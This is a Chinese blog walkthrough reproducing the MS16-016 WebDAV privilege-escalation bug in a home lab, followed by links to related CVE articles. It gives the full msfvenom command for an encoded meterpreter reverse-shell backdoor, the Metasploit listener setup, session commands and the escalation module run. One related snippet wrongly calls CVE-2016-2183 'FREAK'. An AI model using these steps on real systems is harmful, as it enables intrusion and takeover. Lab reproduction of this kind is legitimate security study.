CVE-2016-0051(WebDaV)漏洞复现

最新推荐文章于 2024-05-30 07:38:07 发布
最新推荐文章于 2024-05-30 07:38:07 发布
阅读量1.6k 收藏 1
点赞数
分类专栏: 各种漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yangbz123/article/details/107876716
版权

MS16-016(WebDaV)漏洞复现
目标机:win7x64 192.168.235.142
攻击机:kali 192.168.235.137
1、 确定目标主机和攻击机能够ping通
在这里插入图片描述
在这里插入图片描述
2、 启动kaliLinux终端利用msfvenom生成后门 输入命令msfvenom -p(-p用来设置参数的) windows/meterpreter/reverse_tcp LHOST=192.168.235.137(LHOST用来设置本地主机ip) LPORT=2222(LPORT=2222用来设置本地监听端口号) -e(-e表示encoder编码) x86/shinkata_ga_nai -i(-I 编码次数) 5 -b(将制定特征进行再编码) ‘x00’ -f(生成文件的格式) exe -o(生成路径及文件名) /root/1.exe
在这里插入图片描述
3、打开win7主机上的winSCP软件用来模仿文件下载
在这里插入图片描述
4、登录192.168.235.137 端口默认22 用来下载文件
在这里插入图片描述
5、已经登录到这个服务器进行文件下载
在这里插入图片描述
将文件1.exe的文件下载到桌面上木马文件已经上传
6、启动msf 终端输入msfconsole
在这里插入图片描述
7、终端中输入use exploit/multi/handler 进入到该模块 show options查看选项
在这里插入图片描述
8、set payload windows/meterpreter/reverse_tcp设置生成木马时 用的payload
在这里插入图片描述
9、show options 设置本地IP 端口 set LHOST 192.168.235.137 set LPORT 2222
在这里插入图片描述
在这里插入图片描述
10、show options 查看配置后的信息
在这里插入图片描述
11、输入run开始监听目标机
在这里插入图片描述
12、双击win7上的1.exe返回kali一个会话
在这里插入图片描述
输入session -l 查看会话id 看到是1 输入session 1
得到meterpreter
在这里插入图片描述
13、输入sysinfo查看目标机信息
在这里插入图片描述
输入getuid 查看当前获取的用户权限
在这里插入图片描述
14、终端中输入ps 看见木马程序1.exe的进程id为 2924
在这里插入图片描述
15、输入migrate 1608尝试将其添加到mysqld 进程中
在这里插入图片描述结果权限不够
16、输入background转入后台.
在这里插入图片描述
17、下面我们进行提权 search ms16 搜索这个相关的模块
并切换到该模块
在这里插入图片描述
在这里插入图片描述
配置会话id
在这里插入图片描述
18、run进行攻击导致蓝屏

bye_X
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2016-0051, EoP 2016 0051的EoP ( Win7 ) &蓝屏( Win10 ) PoC ( MS 016.zip
10-10
CVE-2016-0051, EoP 2016 0051的EoP ( Win7 ) &蓝屏( Win10 ) PoC ( MS 016 CVE-2016-0051Proof-of-concept BSoD ( 蓝屏死亡画面) 和提升我的CVE-2016-0051 ( ms-016 )的特权( 到系统) 代码。 EoP到 Windows 7 SP1 x86系统 W
我用php开发的webdav协议的软件phpdav
weixin_33997389的博客
05-04 1484
2019独角兽企业重金招聘Python工程师标准>>> ...
k8s安全测评漏洞:SSL-TLS协议信息泄露漏洞(CVE-2016-2183)
dzqxwzoe的博客
05-30 2131
扫描结果重点关注warnings,64-bit block cipher 3DES vulnerable to SWEET32。k8s组件使用了IDEA、DES和3DES等算法,修改配置文件禁用上述算法即可。增加后kube-apiserver漏洞即修成功。attack,漏洞成功则没有该项提示。可以看到没有了warnings这项了。可以看到没有了warnings这项了。可以看到没有了warnings这项了。可以看到没有了warnings这项了。增加后etcd漏洞即修成功。只需要修最后一项即可。
Windows提权
haoge1998的博客
04-25 4816
Windows提权 Windows基础知识 一、用户与用户组 在Windows中,不同用户有着不同的权限。主要权限包括有: 完全控制 修改 读取和执行 列出文件夹内容 读取 写入 1、内置用户 Administrator:系统管理员账号,拥有完全控制权 Guest:来宾账号,基本权限,默认时禁用 2、查看本地用户 net user 3、查看用户详细信息 net user darkid 用户也可以属于多个用户组,常见的用户组是 管理组(Administrators)、普通用户组(Users)、i
Windows WebDAV服务漏洞+利用+修
weixin_62485906的博客
03-18 566
安装服务的时候要安装WebDAV。在靶机web目录写马。禁用WebDAV服务。
python创建一个目录_生成一个运行sDist的目录并创建一个空的sDist包
weixin_30019895的博客
12-24 592
创建了一个安装文件。用下面的代码设置.py是import sysfrom distutils.core import setupsetup(name='SomePackage',author='dave',version='0.1.0',author_email='dave',packages=['apples',],license='LICENSE.txt',url="None",include...
CVE-2016-8655 Linux内核提权漏洞POC
11-18
CVE-2016-8655 Linux内核提权漏洞POC
CVE-2016-3720
02-22
这个项目是CVE-2016-3720 Demo,为了避免搭建环境,大佬们可以直接获取到这个资源。 相对应的分析文章是:https://blog.csdn.net/qq_36869808 可以在这篇文章看到分析的内容,感谢~当然如果非常需要这个资源,也...
解决OpenSSL "SSL-Death-Alert" 拒绝服务漏洞(CVE-2016-8610)安全漏洞,升级OpenSSL到OpenSSL 1.1.0k
10-25
最近放开了https服务,安全组扫描出新的漏洞对原OpenSSL 1.0.1g版本升级到OpenSSL 1.1.0k,同时重新编译OpenSSH及nginx,在此提供升级脚本,仅供参考
DirtyCow提权漏洞CVE-2016-5195)1
08-08
脏牛(Dirty Cow)漏洞,全称为“竞争条件写入时制”(Copy-on-Write Race Condition),在2016年被发,其安全漏洞编号为CVE-2016-5195。这个漏洞主要影响的是Linux内核,特别是从2007年的2.6.22版本到修前的...
CVE-2017-7269 IIS6.0WebDAV远程代码执行漏洞(Window提权)
ranuy阮的博客
04-19 2456
漏洞说明:开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行,目前针对 Windows Server 2003 R2 可以稳定利用,该漏洞最早在2016年7,8月份开始在野外被利用。 影响产品:Microsoft Windows Server 2003 R2 开启WebDAV服务的IIS6.0(目前已验证,其他版本尚未验证) 触发函数:ScStoragePathFromUr...
IIS 6.0 WebDAV远程代码执行(CVE-2017-7269) 含POC与修方法
Anprou的博客
03-28 5411
2015年7月15日,微软已停止对Windows Server 2003的支持,所以官方没有相关解决方案,建议用户升级到最新系统 Windows Server 2016。
Web中间件常见漏洞总结
qq_35358965的博客
05-09 2790
是一类提供系统软件和应用软件之间的连接,便于软件各部件之间的沟通的软件,应用软件可以借助中间件在不同的技术架构之间共享信息和资源。中间件位于客户机服务器的操作系统之上,管理着计算资源和网络通信。中间件=平台+通信。
CVE-2016-5734漏洞
qq_56426046的博客
09-11 470
在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞
【实战】WebDav远程溢出漏洞分析
FreeXploiT
03-30 1519
WebDav远程溢出漏洞分析创建时间:2003-03-27文章属性:原创文章来源:http://www.xfocus.net文章提交:isno (isno_at_sina.com)WebDav远程溢出漏洞分析by isno@xfocus.org一、漏洞分析    这个漏洞可能是前些年就有牛人发了的,不过一直没公布,直到最近微软出了安全公告大家才知道原来有这么个漏洞。虽然WebDav是通过IIS来
Web中间件常见漏洞
weixin_67813445的博客
04-19 1281
apache默认一个文件可以有多个以点切割的后缀,当最右的后缀无法识别时,就继续向左识别,直到识别到合法后缀才开始解析,如xxx.php.qqq,qqq无法识别,就继续解析,到php时能够识别,就解析为php文件。由于nginx.conf的如下配置导致nginx把以’.php’结尾的文件交给fastcgi处理,对于任意文件名,在后面添加/xxx.php(xxx)为任意字符后,即可将文件作为php解析。访问构造某个存在的短文件,会返回404,访问构造某个不存在的短文件,会返回400。
WebDav漏洞简单分析及通用exploit设计
FreeXploiT
10-29 2184
WebDav漏洞简单分析及通用exploit设计    拜读了isno写的>、>,以及Nankia写的>之后,用他们发布的exploit、以及能在网上找到的exploit在我的一些测试机上测试,有些成功,有些不成功。于是便想自己调试一下。在后来的调试过程中,参考了大量资料,特别是yuange所写的>。在这过程中我学到了很多东西,自己也有些心得体会,其中可能有不少错误的地方,于是便想写下来,一来请各
Web中间件常见安全漏洞总结
qq_40907977的博客
08-14 6631
IIS IIS是Internet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。IIS目前只适用于Windows系统,不适用于其他操作系统。 解析漏洞 IIS 6.X 基于文件名 该版本 默认会将 *.asp;.jpg 此种格式的文件名,当成Asp解析,原理是 服务器默认不解析; 号及其后面的内容,相当于截断。 基于文件夹名 该版本 默认会将 *.asp/目录下的所有文件当成Asp解析。 另外,IIS6.
SSL漏洞CVE-2016-2183漏洞
最新发布
06-29
SSL漏洞CVE-2016-2183,也称为"FREAK"漏洞(FREAK stands for Factoring RSA Exponent K-Anonymity),是一个影响TLS/SSL协议的高级加密标准(AES)实的安全漏洞。该漏洞利用了客户端和服务器在选择加密套件时的一个弱点,允许中间人通过特殊的方式推测出服务器和客户端使用的密钥参数。 这个漏洞通常涉及以下步骤: 1. **环境设置**:你需要一个支持受影响版本的SSL/TLS库(如OpenSSL)的环境,以及能够发起TLS连接的工具(如curl或openssl本身)。 2. **目标服务器**:找到使用容易受到FREAK攻击的加密套件(例如,某些版本的ECDHE-RSA-AES128-SHA)的服务器,比如一些旧版的HTTPS服务。 3. **发起请求**:作为中间人,你可以使用特殊的TLS连接请求,其中包含特定的参数以诱导服务器选择FREAK漏洞可用的套件。 4. **分析响应**:服务器如果中招,它会使用FREAK攻击所依赖的弱密钥参数。你可能需要查看加密后的通信数据,使用特定工具(如Wireshark)解码并分析这些参数。 5. **验证结果**:如果你成功地从服务器的响应中提取到了敏感信息,就证明了漏洞的存在。不过,代的SSL/TLS实通常会修这个问题,所以成功的可能性较低。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值